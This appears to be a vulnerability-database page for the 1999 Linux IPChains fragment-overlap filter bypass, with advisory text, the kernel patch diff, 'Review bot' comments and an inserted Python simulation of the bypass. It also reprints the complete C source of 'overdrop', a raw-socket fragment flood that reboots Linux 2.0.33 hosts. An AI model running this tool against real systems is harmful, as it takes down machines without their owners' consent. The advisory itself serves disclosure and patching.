CVE-1999-1018
CVSS 7.5
Published: 1999-07-27 00:00:00
Revised: 2016-10-17 22:00:16

[Original] IPChains in Linux kernels 2.2.10 and earlier does not reassemble IP fragments before checking the header information, which allows a remote attacker to bypass the filtering rules using several fragments with 0 offsets.


[CNNVD] Linux IPChains Fragment Overlap Vulnerability (CNNVD-199907-030)

        IPChains in Linux kernels 2.2.10 and earlier is vulnerable. IPChains does not reassemble IP fragments before checking the header information, which allows a remote attacker to bypass the filtering rules using several fragments with 0 offsets.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:linux:linux_kernel:2.2.0    Linux Kernel 2.2
cpe:/o:linux:linux_kernel:2.2.10   Linux Kernel 2.2.10

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1018
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1018
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-030
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=93312523904591&w=2
(UNKNOWN)  BUGTRAQ  19990727 Linux 2.2.10 ipchains Advisory
http://www.securityfocus.com/bid/543
(VENDOR_ADVISORY)  BID  543

- Vulnerability information

Linux IPChains Fragment Overlap Vulnerability
Severity: High   Type: Other
1999-07-27 00:00:00 2005-10-20 00:00:00
Remote
        IPChains in Linux kernels 2.2.10 and earlier is vulnerable. IPChains does not reassemble IP fragments before checking the header information, which allows a remote attacker to bypass the filtering rules using several fragments with 0 offsets.

- Advisory and patch

        This patch was provided with the DataProtect advisory posted to BugTraq on July 27, 1999. The solution was incorporated into the 2.2.11 kernel, released in August 1999.

- Vulnerability information (19301)

Linux kernel 2.0.33 IP Fragment Overlap Vulnerability (EDBID:19301)
linux remote
1998-04-17 Verified
0 Michal Zalewski
N/A
source: http://www.securityfocus.com/bid/376/info

Linux kernel 2.0.33 is vulnerable to a denial of service attack related to overlapping IP fragments. The bug is not in the handling of the fragments themselves, but in the action taken when an oversized packet is received: a printk call in the function ip_glue includes a variable without any sort of wrapping or protection. The consequence is a serious remote denial of service [i.e., reboot of the machine].


// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <time.h>        /* time(): used in main() to seed the PRNG */
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#define IP_MF   0x2000   /* "more fragments" flag in the IP frag field */
#define IPH     0x14     /* IP header length, 20 bytes */
#define UDPH    0x8      /* UDP header length, 8 bytes */
#define PADDING 0x1c
#define MAGIC   0x3
#define COUNT   0xBEEF   /* default number of packets to send */
#define FRAG2   0xFFFF
void usage(char *name) {
      fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ]\n",name);
      exit(0);
}

u_long name_resolve(char *host_name) {
      struct in_addr addr;
      struct hostent *host_ent;
      if ((addr.s_addr=inet_addr(host_name))==-1) {
        if (!(host_ent=gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
      }
      return (addr.s_addr);
}


void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
      u_char *packet=NULL,*p_ptr=NULL;
      u_char byte;
      struct sockaddr_in sin;
      sin.sin_family=AF_INET;
      sin.sin_port=src_prt;
      sin.sin_addr.s_addr=dst_ip;
      packet=(u_char *)malloc(IPH+UDPH+PADDING);
      p_ptr=packet;
      bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
      byte=0x45;
      memcpy(p_ptr,&byte,sizeof(u_char));
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(242);
      p_ptr+=2;
      *((u_short *)p_ptr)|=htons(IP_MF);
      p_ptr+=2;
      *((u_short *)p_ptr)=0x40;
      byte=IPPROTO_UDP;
      memcpy(p_ptr+1,&byte,sizeof(u_char));
      p_ptr+=4;
      *((u_long *)p_ptr)=src_ip;
      p_ptr+=4;
      *((u_long *)p_ptr)=dst_ip;
      p_ptr+=4;
      *((u_short *)p_ptr)=htons(src_prt);
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(dst_prt);
      p_ptr+=2;
      *((u_short *)p_ptr)=htons(8+PADDING);
      if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
		 sizeof(struct sockaddr))==-1) {
        perror("\nsendto");
        free(packet);
        exit(1);
      }
      p_ptr=&packet[2];
      *((u_short *)p_ptr)=htons(IPH+MAGIC+1);
      p_ptr+=4;
      *((u_short *)p_ptr)=htons(FRAG2);
      if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
		 sizeof(struct sockaddr))==-1) {
        perror("\nsendto");
        free(packet);
        exit(1);
      }
      free(packet);
}


int main(int argc, char **argv) {
      int one=1,count=0,i,rip_sock;
      u_long  src_ip=0,dst_ip=0;
      u_short src_prt=0,dst_prt=0;
      struct in_addr addr;
      fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
      if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
        perror("raw socket");
        exit(1);
      }
      if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
        perror("IP_HDRINCL");
        exit(1);
      }
      if (argc < 2) usage(argv[0]);
      if (!(dst_ip=name_resolve(argv[1]))) {
        fprintf(stderr,"Can't resolve destination address.\n");
        exit(1);
      }
      while ((i=getopt(argc,argv,"s:n:"))!=EOF) {
        switch (i) {
	case 'n':
            count   = atoi(optarg);
            break;
	case 's':
	  if (!(src_ip=name_resolve(optarg))) {
              fprintf(stderr,"Can't resolve source address.\n");
              exit(1);
	  }
            break;
	default:
            usage(argv[0]);
            break;
        }
      }
      srandom((unsigned)(time((time_t)0)));
      if (!count) count=COUNT;
      fprintf(stderr,"Sending oversized packets:\nFrom: ");
      if (!src_ip) fprintf(stderr,"       (random)"); else {
        addr.s_addr = src_ip;
        fprintf(stderr,"%15s",inet_ntoa(addr));
      }
      addr.s_addr = dst_ip;
      fprintf(stderr,"\n  To: %15s\n",inet_ntoa(addr));
      fprintf(stderr," Amt: %5d\n",count);
      fprintf(stderr,"[ ");
      for (i=0;i<count;i++) {
        if (!src_ip) send_frags(rip_sock,rand(),dst_ip,rand(),rand()); else
          send_frags(rip_sock,src_ip,dst_ip,rand(),rand());
        fprintf(stderr, "b00z ");
        usleep(500);
      }
      fprintf(stderr, "]\n");
      return (0);
}
		

- Vulnerability information

6104
ipchains Fragmentation Header Port Rewrite Filter Bypass
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

1999-07-27 Unknown
1999-07-27 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Linux IPChains Fragment Overlap Vulnerability
Failure to Handle Exceptional Conditions 543
Yes No
1999-07-27 12:00:00 2009-07-11 12:56:00
First released in DataProtect security advisory #2, published on July 27, 1999.

- Affected program versions

Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2

- Vulnerability discussion

There is a vulnerability in the Linux firewall implementation in kernels 2.2.0 and above (IPChains) that may allow an attacker to send data to a blocked port. When a fragment is sent to a non-filtered port on the firewall with the IP_MF bit set, an offset of 0 and a full TCP header inside, it is possible to overlap the TCP port information by sending another fragment with an offset of 0, the IP_MF bit set and a length of 4 carrying the destination port number. What happens is the following: when fragment A reaches the firewall, it is passed on to the target host on the assumption that it is going to the allowed port named in the TCP header included in the fragment. The second fragment is sent along its way as well, only to overlap the port information of the first while inside the reassembly chain. To finish off the attack, a fragment is sent with a normal offset (relative to the initial fragment) and the IP_MF bit unset. Two conditions need to be met for this vulnerability to be exploitable: the Linux kernel doing the firewalling must be configured so that defragmentation does not occur before packets pass through the filters, and the firewall must allow non-first fragments to pass through.

The first two fragments sent may need to be reversed depending on the defragmentation implementation of the target host operating system.
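The three-fragment sequence described above, run through a Python model of the ipchains first-fragment check before and after the 2.2.11 fix. This is an added example, not code from the page, from the kernel or from DataProtect: the `size_req` values for TCP/UDP/ICMP, the rule set (TCP to port 25 allowed, non-first fragments pass), the constructed addresses and ports, and the "latest data wins" reassembly policy are all assumptions. It shows why the old `offset = (tot_len < ihl*4 + size_req)` line mattered: a truncated first fragment was demoted to a non-first fragment and sailed through, whereas the patched check returns FW_BLOCK.

```python
import struct

IP_MF = 0x2000
IP_OFFMASK = 0x1FFF
IPPROTO_ICMP, IPPROTO_TCP, IPPROTO_UDP = 1, 6, 17
FW_ACCEPT, FW_BLOCK = "FW_ACCEPT", "FW_BLOCK"


def size_req(protocol):
    """Bytes of transport header a first fragment must carry before the
    filter looks at its ports. Assumed values modelled on the size_req
    switch in ip_fw.c (the page's hunk shows only its default branch)."""
    if protocol == IPPROTO_TCP:
        return 16                      # through the TCP flags word
    if protocol in (IPPROTO_UDP, IPPROTO_ICMP):
        return 8
    return 0


def parse_ipv4(pkt):
    """Pull the fields the filter needs out of a raw IPv4 header."""
    ver_ihl, _tos, tot_len, _id, frag, _ttl, proto, _csum, _src, _dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return {"ihl": ver_ihl & 0x0F, "tot_len": tot_len, "protocol": proto,
            "mf": bool(frag & IP_MF), "offset": frag & IP_OFFMASK}


def first_fragment_check(hdr, patched):
    """The offset == 0 branch before and after the fix.
    Returns (treat_as_first_fragment, verdict_or_None)."""
    if hdr["offset"] != 0:
        return False, None             # genuine non-first fragment
    short = hdr["tot_len"] < (hdr["ihl"] << 2) + size_req(hdr["protocol"])
    if not short:
        return True, None
    if patched:
        return False, FW_BLOCK         # "Suspect short first fragment."
    # Pre-patch: offset = (tot_len < ihl*4 + size_req) evaluated to 1, so
    # the truncated first fragment was silently treated as a non-first
    # fragment and its port bytes were never compared against the rules.
    return False, None


def filter_fragment(pkt, allowed_tcp_ports, pass_non_first, patched):
    """Verdict of a minimal rule set: TCP to allowed ports, plus a
    'let non-first fragments through' rule (the vulnerable configuration)."""
    hdr = parse_ipv4(pkt)
    is_first, verdict = first_fragment_check(hdr, patched)
    if verdict:
        return verdict
    if not is_first:
        return FW_ACCEPT if pass_non_first else FW_BLOCK
    if hdr["protocol"] == IPPROTO_TCP:
        off = hdr["ihl"] << 2
        _sport, dport = struct.unpack("!HH", pkt[off:off + 4])
        return FW_ACCEPT if dport in allowed_tcp_ports else FW_BLOCK
    return FW_BLOCK


def ipv4_fragment(payload, offset_units, more, proto=IPPROTO_TCP):
    """Constructed IPv4 header (checksum left 0) in front of `payload`."""
    frag = (IP_MF if more else 0) | (offset_units & IP_OFFMASK)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234,
                      frag, 64, proto, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return hdr + payload


def reassemble(fragments):
    """Naive reassembler where later-arriving data overwrites earlier data
    on overlap (assumption: the host behaviour the discussion describes)."""
    buf = bytearray()
    for pkt in fragments:
        hdr = parse_ipv4(pkt)
        start, data = hdr["offset"] * 8, pkt[hdr["ihl"] << 2:]
        if len(buf) < start + len(data):
            buf.extend(b"\0" * (start + len(data) - len(buf)))
        buf[start:start + len(data)] = data
    return bytes(buf)


def demo(patched):
    """Returns (per-fragment verdicts, destination port the host reassembles)."""
    # Fragment A: full 20-byte TCP header to allowed port 25, plus 4 data bytes.
    tcp_hdr = struct.pack("!HHIIBBHHH", 40000, 25, 1, 0, 0x50, 0x02, 8192, 0, 0)
    frag_a = ipv4_fragment(tcp_hdr + b"ABCD", 0, True)
    # Fragment B: offset 0, MF set, only 4 bytes: the ports, dport rewritten to 23.
    frag_b = ipv4_fragment(struct.pack("!HH", 40000, 23), 0, True)
    # Fragment C: normal offset (24 bytes = 3 units), MF clear.
    frag_c = ipv4_fragment(b"payload", 3, False)
    frags = (frag_a, frag_b, frag_c)
    verdicts = [filter_fragment(f, {25}, True, patched) for f in frags]
    passed = [f for f, v in zip(frags, verdicts) if v == FW_ACCEPT]
    _sport, dport = struct.unpack("!HH", reassemble(passed)[:4])
    return verdicts, dport


if __name__ == "__main__":
    print("pre-patch:", demo(False))   # fragment B passes, host sees port 23
    print("patched:  ", demo(True))    # fragment B blocked, host sees port 25
```

Reassembling before filtering (the first of the two conditions above) removes the problem entirely, since the filter then only ever sees the final datagram; the patched check is the fallback for firewalls that filter unreassembled fragments.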

- Exploit

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

This patch was provided with the DataProtect advisory posted to BugTraq on July 27, 1999. The solution was incorporated into the 2.2.11 kernel, released in August 1999.

*** linux.old/net/ipv4/ip_fw.c Wed Jun 9 05:33:07 1999
--- linux/net/ipv4/ip_fw.c Fri Jul 23 19:20:45 1999
***************
*** 37,42 ****
--- 37,45 ----
* 19-May-1999: Star Wars: The Phantom Menace opened. Rule num
* printed in log (modified from Michael Hasenstein's patch).
* Added SYN in log message. --RR
+ * 23-Jul-1999: Fixed small fragment security exposure opened on 15-May-1998.
+ * John McDonald <jm@dataprotect.com>
+ * Thomas Lopatic <tl@dataprotect.com>
*/

/*
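Review bot: the changelog entry dates the exposure to 15-May-1998 and credits the two authors, but gives no pointer to where the issue is analysed; add a reference to the DataProtect advisory posted to BugTraq on July 27, 1999 (cited in the text above) so a reader of ip_fw.c can find the reasoning behind the new check.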
***************
*** 644,650 ****
default:
size_req = 0;
}
! offset = (ntohs(ip->tot_len) < (ip->ihl<<2)+size_req);
}

src = ip->saddr;
--- 647,666 ----
default:
size_req = 0;
}
!
! /* If it is a truncated first fragment then it can be
! * used to rewrite port information, and thus should
! * be blocked.
! */
!
! if (ntohs(ip->tot_len) < (ip->ihl<<2)+size_req)
! {
! if (!testing && net_ratelimit()) {
! printk("Suspect short first fragment.\n");
! dump_packet(ip,rif,NULL,NULL,0,0,0,0);
! }
! return FW_BLOCK;
! }
}

src = ip->saddr;
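Review bot: the removed line `offset = (ntohs(ip->tot_len) < (ip->ihl<<2)+size_req);` is the root cause visible in this hunk: a first fragment too short to carry the port fields was converted into `offset = 1`, i.e. silently reclassified as a non-first fragment, which any rule that lets non-first fragments through would then pass, so a 4-byte fragment at offset 0 could rewrite the ports unchecked. Returning `FW_BLOCK` closes that path, and gating `printk`/`dump_packet` behind `net_ratelimit()` keeps a stream of such fragments from flooding the log. One follow-up: the check is only as strong as `size_req`, which the hunk shows as 0 in the `default:` case, so for protocols other than those handled above the switch a short first fragment is caught only when `tot_len` is smaller than the IP header itself; document that the protection targets port-rewriting for the protocols that set a non-zero `size_req`.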

- Related references

     

     
